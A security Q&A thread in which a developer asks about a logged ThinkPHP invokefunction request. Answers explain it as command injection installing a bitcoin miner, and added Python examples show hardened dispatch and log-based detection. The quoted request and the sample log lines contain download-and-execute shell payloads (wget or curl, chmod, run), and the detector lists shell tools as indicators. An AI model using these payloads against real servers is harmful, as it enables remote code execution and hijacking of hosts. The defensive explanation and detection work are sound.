How to prevent users from executing commands through browser URL


I have very little experience with security (still learning); however, I was combing through my logs and noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now, first of all, this made no sense to me, with the exception of chmod 777, which tells me someone was trying to change my file permissions.

My question is: what kind of attack is this, and what steps can I take to prevent it?










asked 20 hours ago
user3718908

  • Specifically, the attacker is targeting ThinkPHP installations that suffer from the remote-code-execution vulnerability documented here. A security update has been released by ThinkPHP. Keep an eye on the inventory of software that you have exposed to the internet, and keep an eye out for vulnerabilities found in these packages. In short, stay up to date. The attackers are usually exploiting old versions found to be vulnerable.

    – spender
    17 hours ago

  • Are you 1) a developer or 2) a systems engineer / webmaster? Do you develop or run applications?

    – usr-local-ΕΨΗΕΛΩΝ
    11 hours ago

  • I am a developer.

    – user3718908
    10 hours ago

  • Applications are immune to these attacks by default - you have to actively screw up in order for the attack to work.

    – immibis
    7 hours ago

  • So if you're asking how to avoid this attack - unless you're running ThinkPHP, you're already not vulnerable. If you're asking how to avoid similar attacks on your own software - see the information linked by Soufiane.

    – immibis
    7 hours ago

2 Answers
It's a command injection attack, in which:

the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

There are many strategies to mitigate or avoid this kind of attack; you can find some here, and have a look at this cheatsheet from OWASP.






answered 20 hours ago
Soufiane Tahiri

  • The easiest and maybe most important step from the first link is using 'least privilege'. Reducing the power of the application will blunt these kinds of attacks and many others.

    – JimmyJames
    7 hours ago
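To make the bug class and the mitigations concrete, here is an added example (not code from the question, the answers, or ThinkPHP) that puts the vulnerable "name a function in the request" shape next to an allowlisted dispatcher and a shell-free child process; every function and handler name in it is hypothetical, and the download host in the payload is a placeholder.

```python
"""Added example, not code from the question or its answers. It models the bug
class behind the request in the question (request parameters choosing which
function runs and what it receives) next to the two fixes the OWASP guidance
comes down to: dispatch only through an explicit allowlist, and never hand
user data to a shell. Every function and handler name below is hypothetical."""
import os
import re
import subprocess
import sys
from typing import Callable, Dict, Tuple

# Constructed argument modelled on the query string in the question, with the
# real download host replaced by a placeholder.
INJECTED = "wget http://EXAMPLE-HOST/a.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a;"


def vulnerable_resolve(name: str) -> Callable:
    """The vulnerable shape: a request parameter is used as a function name and
    resolved against a namespace that happens to contain os.system. This only
    resolves and never calls, so it is harmless to run; in the vulnerable app
    the next step is func(*attacker_supplied_args)."""
    return getattr(os, name)


# Hardened dispatch: a closed table of handlers. The request can only choose
# among these keys, so os.system is unreachable whatever name is sent.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def handler_lookup_host(arg: str) -> str:
    # Positive validation: the argument must be a plain hostname, nothing else.
    if not HOST_RE.fullmatch(arg):
        raise ValueError("argument is not a plain hostname")
    return f"would resolve {arg}"


def handler_echo(arg: str) -> str:
    """Runs a child with an argv list and no shell, so ';' and spaces inside
    arg are data rather than command separators. The child is the interpreter
    itself, so the example runs wherever Python does; it prints argv[1] back."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", arg],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


HANDLERS: Dict[str, Callable[[str], str]] = {
    "lookup_host": handler_lookup_host,
    "echo": handler_echo,
}


def safe_dispatch(name: str, arg: str) -> Tuple[bool, str]:
    """Returns (ok, detail). Unknown names are refused before the argument is
    even looked at; handler validation failures are reported, not raised."""
    handler = HANDLERS.get(name)
    if handler is None:
        return False, f"refused: no such action {name!r}"
    try:
        return True, handler(arg)
    except ValueError as exc:
        return False, f"refused: {exc}"


if __name__ == "__main__":
    print("vulnerable resolve:", vulnerable_resolve("system"))
    for action in ("system", "lookup_host", "echo"):
        print(action, "->", safe_dispatch(action, INJECTED))
```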
As stated before, it's a command injection attack that attempts to download a .sh script, grant it permission to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane linked should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used, which will block requests like these before they reach your server process.






answered 19 hours ago
Veyf
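On the detection side, the following added example (not code from the question or the answers, and not any WAF product's rules) triages log lines like the one in the question: it decodes the request, flags the ThinkPHP invokefunction shape and generic command-injection markers, and recovers the injected command. The log lines are constructed, with the download host replaced by a placeholder, and the indicator and verdict names are this example's own.

```python
"""Added example, not code from the question or its answers: a triage helper
for access-log lines shaped like the one in the question. It decodes the
request target, flags the ThinkPHP invokefunction/call_user_func_array shape
and generic command-injection markers, and recovers the decoded command. The
log lines are constructed (the first is modelled on the question's, with the
download host replaced); indicator names and verdicts are this example's own."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Request/status/bytes fields of a combined-format line, with or without the
# client IP and timestamp in front of them.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<bytes>\d+|-)')
THINKPHP_ROUTE = re.compile(r"invokefunction", re.I)
PHP_CALLABLES = {"call_user_func_array", "call_user_func", "system", "exec", "shell_exec", "passthru"}
SHELL_META = re.compile(r"[;|&`$]")                      # separators / substitution
TOOL_WORDS = re.compile(r"\b(wget|curl|chmod)\b|/tmp/")  # download-and-run vocabulary

SAMPLE_LOG = [
    # constructed, modelled on the request in the question
    r'"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://EXAMPLE-HOST/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    # constructed benign request to the same front controller
    r'"GET /index.php?s=/index/blog/read&id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # constructed variant with an extra layer of percent-encoding on the command
    r'"GET /index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%2520http%253A%252F%252FEXAMPLE-HOST%252Fb.sh%2520%257Csh HTTP/1.1" 404 169 "-" "python-requests/2.21.0"',
]


def deep_decode(value: str, rounds: int = 3) -> str:
    """Percent-decodes until the value stops changing (bounded), so the
    detector inspects the form the application would finally act on."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query: str) -> Dict[str, List[str]]:
    """Splits on '&' only. Older urllib.parse.parse_qs also split on ';', which
    would cut this very payload at '/tmp/a;' and hide the rest of it."""
    params: Dict[str, List[str]] = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params.setdefault(deep_decode(key), []).append(deep_decode(value))
    return params


def analyze(line: str) -> Optional[Dict[str, object]]:
    """Report for one log line, or None if it carries no request field."""
    m = LOG_RE.search(line)
    if not m:
        return None
    raw_path, _, query = m.group("target").partition("?")
    path, params = deep_decode(raw_path), parse_query(query)
    values = [v for vs in params.values() for v in vs]
    indicators: List[str] = []
    payload: Optional[str] = None
    if any(THINKPHP_ROUTE.search(h) for h in [path] + values):
        indicators.append("thinkphp-invokefunction-route")
    for v in values:
        if v in PHP_CALLABLES:
            indicators.append(f"php-callable-as-parameter:{v}")
        if SHELL_META.search(v) and TOOL_WORDS.search(v):
            indicators.append("shell-command-in-parameter")
            payload = v  # the string the attacker wanted a shell to run
    callable_seen = any(i.startswith("php-callable") for i in indicators)
    if "thinkphp-invokefunction-route" in indicators and callable_seen:
        verdict = "thinkphp_rce_attempt"
    elif payload is not None:
        verdict = "command_injection_attempt"
    else:
        verdict = "clean"
    return {"status": int(m.group("status")), "route": params.get("s", [path])[0],
            "indicators": indicators, "payload": payload, "verdict": verdict}


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Reports for every parseable line. A flagged line the server answered
    with 200 is the one to follow up on the host (dropped file, odd processes)."""
    return [r for r in (analyze(line) for line in lines) if r is not None]
```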



















